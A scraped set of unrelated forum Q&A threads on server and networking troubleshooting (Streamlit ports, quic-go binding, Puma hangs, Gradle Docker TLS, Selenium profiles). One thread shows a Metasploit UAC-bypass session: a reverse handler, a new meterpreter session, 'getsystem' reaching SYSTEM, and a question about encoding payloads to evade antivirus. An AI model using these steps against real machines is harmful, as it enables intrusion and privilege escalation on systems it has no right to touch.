I have installed streamlit on my Mac with pdm and launched the command streamlit hello to view the demos. The command returns the following:
❯ pdm run streamlit hello
2022-03-21 11:43:45.812 WARNING streamlit.config:
Warning: the config option 'server.enableCORS=false' is not compatible with 'server.enableXsrfProtection=true'.
As a result, 'server.enableCORS' is being overridden to 'true'.
More information:
In order to protect against CSRF attacks, we send a cookie with each request.
To do so, we must specify allowable origins, which places a restriction on
cross-origin resource sharing.
If cross origin resource sharing is required, please disable server.enableXsrfProtection.
2022-03-21 11:43:45.816 DEBUG streamlit.logger: Initialized tornado logs
2022-03-21 11:43:45.818 DEBUG matplotlib.pyplot: Loaded backend agg version unknown.
2022-03-21 11:43:45.819 DEBUG streamlit.bootstrap: Setting up signal handler
2022-03-21 11:43:45.819 DEBUG asyncio: Using selector: KqueueSelector
2022-03-21 11:43:45.827 DEBUG streamlit.server.server: Starting server...
2022-03-21 11:43:45.827 DEBUG streamlit.server.server: Serving static content from the Node dev server
2022-03-21 11:43:45.830 DEBUG streamlit.server.server: Server started on port 8501
2022-03-21 11:43:45.831 DEBUG streamlit.server.server: Server state: State.INITIAL -> State.WAITING_FOR_FIRST_BROWSER
2022-03-21 11:43:46.029 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.041 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.054 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.066 DEBUG git.cmd: Popen(['git', 'rev-parse', '--show-toplevel'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
Welcome to Streamlit. Check out our demo in your browser.
Local URL: http://localhost:3000
Network URL: http://192.168.1.117:3000
Ready to create your own Python apps super quickly?
Head over to https://docs.streamlit.io
May you create awesome apps!
However, when I connect to the local URL, the connection is rejected:
I tried switching to Brave Browser and Firefox, but I got the same error.
From other SO questions, I tried the following:
❯ apachectl configtest
AH00557: httpd: apr_sockaddr_info_get() failed for Lucas-MacBook-Air.local
AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message
Syntax OK
I also ran this:
ps -ax | grep 'httpd'
124 ?? 0:00.85 /usr/sbin/httpd -D FOREGROUND
517 ?? 0:00.00 /usr/sbin/httpd -D FOREGROUND
6627 ttys002 0:00.01 grep httpd
I tried launching other stuff that creates a local server, e.g. Jupyter Notebooks, and they work.
The problem is known: streamlit does not support pdm at the time of writing, as mentioned by #cye18 on the parallel issue opened on pdm's github page.
The problem is that, while streamlit configs default to server port 8501, the server is launched on the port 3000. You can force this behaviour in two ways.
The first is by manually changing streamlit's settings, which lies in ~/.streamlit/config.toml or locally in your project directory.
[server]
serverPort = 8501
Alternatively, you can add the following flag to the streamlit command when launching it:
pdm run streamlit run app.py --server.port 8501
Either way, streamlit will complain by saying that server.port does not work when global.developmentMode is true. Once again, this can be solved by adding the flag --global.developmentMode false. The final command will look like this: pdm run streamlit run app.py --server.port 8501 --global.developmentMode false.
Alternatively, the local settings will look like the following:
[server]
port = 8501
[global]
developmentMode = false
Related
The situation is, I wanna establish a QUIC connection based on quic-go from local to ECS server. The related tests using localhost are done both on local and remote device. That is:
#local: .$QUIC-GO-PATH/example/client/main -insecure -keylog ssl.log -qlog trial.log -v https://127.0.0.1:6121/demo/tile
#local: .$QUIC-GO-PATH/example/main -qlog -tcp -v
These tests are completed.
Now is the problem,when I start local-remote connection an error occurred:
#remote: .$QUIC-GO-PATH/example/main -qlog -tcp -v
#local: .$QUIC-GO-PATH/example/client/main -insecure -keylog ssl.log -qlog trial.log -v https://$REMOTE_IPADDR:6121/demo/tile
timeout: no recent network activity
When I go through a wireshark examination, it seems like the CRYPTO handshake never finishes:
Wireshark
Also client Qlog file atteched here:
Qlog file
Codes are all the same with https://github.com/lucas-clemente/quic-go
Help!
This problem has been solved.
Code $QUIC-GO-PATH/example/main.go has binded the port as a default onto 127.0.0.1:6121, which led to the problem that the server cannot get reached by client outside, just get this on server running:
-bind 0.0.0.0:6121
I'm experiencing an unresponsive socket in with my Puma setup after random time. Up to this point I don't have a clue what's causing the issue. I was hoping somebody over here can help we with some answers or point me in the right direction. I'm having the following setup:
I'm using the official docker ruby-2.2.3-slim image together with the latest puma release 2.15.3, I've also installed Nginx as a reverse proxy. But I'm already sure Nginx isn't the problem over here because and I've tried to verify if the socket was working using this script. And the socket wasn't working, I got a timeout over there as well so I could ignore Nginx.
This is a testing environment so the server isn't experiencing any extreme load, I've also check memory consumption it has still several GB's of free space so that couldn't be the issue either.
What triggered me to look at the puma socket was the error message I got in my Nginx error logging:
upstream timed out (110: Connection timed out) while reading response header from upstream
Also I couldn't find anything in the logs of puma indicating what is going wrong, over here are my puma setup:
threads 0, 16
app_dir = ENV.fetch('APP_HOME')
environment ENV['RAILS_ENV']
daemonize
bind "unix://#{app_dir}/sockets/puma.sock"
stdout_redirect "#{app_dir}/log/puma.stdout.log", "#{app_dir}/log/puma.stderr.log", true
pidfile "#{app_dir}/pids/puma.pid"
state_path "#{app_dir}/pids/puma.state"
activate_control_app
on_worker_boot do
require 'active_record'
ActiveRecord::Base.connection.disconnect! rescue ActiveRecord::ConnectionNotEstablished
ActiveRecord::Base.establish_connection(YAML.load_file("#{app_dir}/config/database.yml")[ENV['RAILS_ENV']])
end
And this it the output in my puma state file:
---
pid: 43
config: !ruby/object:Puma::Configuration
cli_options:
conf:
options:
:min_threads: 0
:max_threads: 16
:quiet: false
:debug: false
:binds:
- unix:///APP/sockets/puma.sock
:workers: 1
:daemon: true
:mode: :http
:before_fork: []
:worker_timeout: 60
:worker_boot_timeout: 60
:worker_shutdown_timeout: 30
:environment: staging
:redirect_stdout: "/APP/log/puma.stdout.log"
:redirect_stderr: "/APP/log/puma.stderr.log"
:redirect_append: true
:pidfile: "/APP/pids/puma.pid"
:state: "/APP/pids/puma.state"
:control_url: unix:///tmp/puma-status-1449260516541-37
:config_file: config/puma.rb
:control_url_temp: "/tmp/puma-status-1449260516541-37"
:control_auth_token: cda8879717be7a645ea323d931b88d4b
:tag: APP
The application itself is a Rails app on the latest version 4.2.5, it's deployed on GCE (Google Container Engine).
If somebody could give me some pointer's on how to debug this any further would be very much appreciated. Because now I don't see any output anywhere which could help me any further.
EDIT
I replaced the unix socket with tcp connection to Puma with the same result, still hangs after x time
I'd start with:
How many requests get processed successfully per instance of puma?
Make sure you log the beginning and end of each request with the thread id of the thread executing it, what do you see?
Not knowing more about your application, I'd say it's likely the threads get stuck doing some long/blocking calls without timeouts or spinning on some computation until the whole thread pool gets depleted.
We'll see.
I finally found out why my application was behaving the way it was.
After trying to use a tcp connection and switching to Unicorn I start looking into other possible sources.
That's when I thought maybe my connection to Google Cloud SQL could be the problem. Once I read the faq of Cloud SQL, they mentioned that you have to tweak you Compute instances to ensure they keep open your DB connection. So I performed the next steps they recommend and that solved the problem for me, I added them just in case:
# Display the current tcp_keepalive_time value.
$ cat /proc/sys/net/ipv4/tcp_keepalive_time
# Set tcp_keepalive_time to 60 seconds and make it permanent across reboots.
$ echo 'net.ipv4.tcp_keepalive_time = 60' | sudo tee -a /etc/sysctl.conf
# Apply the change.
$ sudo /sbin/sysctl --load=/etc/sysctl.conf
# Display the tcp_keepalive_time value to verify the change was applied.
$ cat /proc/sys/net/ipv4/tcp_keepalive_time
Hi I try to use this awesome Gradle plugin: https://github.com/bmuschko/gradle-docker-plugin
I use the following URL obtained from my docker-machine / kitematic installation on osx:
docker-machine url default
tcp://192.168.99.100:2376
However using:
url = "tcp://192.168.99.100:2376"
results in the error:
org.apache.http.conn.UnsupportedSchemeException: tcp protocol is not supported
When I change the tcp to httpI get a different error:
INFO org.apache.http.impl.execchain.RetryExec - I/O exception (java.net.SocketException) caught when processing request: Broken pipe
[pool-4-thread-1] ERROR com.github.dockerjava.core.async.ResultCallbackTemplate - Error during callback
org.apache.http.client.ClientProtocolException
in case the gradle dockerBuildImage task is run.
But manually building the Dockerfile created by gradle works without any problems.
The following code can be used to replicate the problem. https://github.com/geoHeil/lab04/blob/master/build.gradle
Docker-machine enables TLS by default. I Switching to the TLSmode should be a good solution:
url = 'https://192.168.59.103:2376'
certPath = new File(System.properties['user.home'], '.boot2docker/certs/boot2docker-vm')
post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:
Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444 exploit
The port is not used yet so should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444
[] Started reverse handler on 0.0.0.0:4444
[] Starting the payload handler...
[] Uploading the bypass UAC executable to the filesystem...
[] Meterpreter stager executable 73802 bytes long being uploaded..
[] Uploaded the agent to the filesystem....
[] Post module execution completed
Then it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't
Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?
Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…
meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
I want start firefox with my custom profile, and when I add some plugins (for example) in this session starting from selenium I want he do not forgot them.
I started selenium server
start "JAVA Selenium Server" java -jar selenium-server.jar -interactive -firefoxProfileTemplate "D:\Ogame\SeleniumStaticProfile"
Then in selenium server
cmd=getNewBrowserSession&1=*custom firefox.exe -p SeleniumStatic -no-remote&2=http://www.google.com
cmd=open&1=httttp://www.hotmail.com
cmd=open&1=httttp://www.google.pl
and i'm gettings error something like:
www.goole.com havent rights to read properties Window.seleniumMarker1299...
All log:
cmd=getNewBrowserSession&1=*custom firefox.exe -p SeleniumStatic
-no-remote&2=ht tttp://www.google.com 13:54:50.817 INFO - ---> Requesting
htttttp://localhost:4444/selenium-server/driver
?cmd=getNewBrowserSession&1=*custom
firefox.exe -p SeleniumStatic
-no-remote&2=h tttttp://www.google.com 13:54:50.823 INFO - Command request:
getNewBrowserSession[*custom
firefox.exe -p SeleniumStatic
-no-remote, htttttp://www.google.com] on session null 13:54:50.824 INFO -
creating new remote session
13:54:50.832 INFO - Allocated session
ad3e48137d024959863ab8bb4c297d55 for
httttp: //www.google.com, launching...
13:54:54.615 INFO - Got result:
OK,ad3e48137d024959863ab8bb4c297d55 on
session a
d3e48137d024959863ab8bb4c297d55
cmd=open&1=http://www.wp.pl
13:55:23.588 INFO - ---> Requesting
httttp://localhost:4444/selenium-server/driver
?cmd=open&1=htttttp://www.wp.pl&sessionId=ad3e48137d024959863ab8bb4c297d55
13:55:23.595 INFO - Command request:
open[htttttp://www.wp.pl, ] on session
ad3e481 37d024959863ab8bb4c297d55
13:55:23.596 WARN - you appear to be
changing domains from
httttp://www.google.com to
htttttp://www.wp.pl this may lead to a
'Permission denied' from the browser
(unless it is running as *iehta or
*chrome, or alternatively the selenium server is runnttting in proxy
injection mode) 13:55:23.691 INFO -
Got result: Witrynie
http://www.google.com nie udzielono
u prawnien do odczytania wlasciwosci
Window.document z
on sessi on
ad3e48137d024959863ab8bb4c297d55
Of course I have entered proxy in Firefox SeleniumStatic profile (localhost:4444)
What am I doing wrong?
Sorry for my bad english :/
Change your commands to look like the following
cmd=getNewBrowserSession&1=*firefox -no-remote&2=http://www.google.com
cmd=open&1=httttp://www.hotmail.com
cmd=open&1=httttp://www.google.pl
YOu don't need to specify the profile since you have already done that when starting the Selenium Server.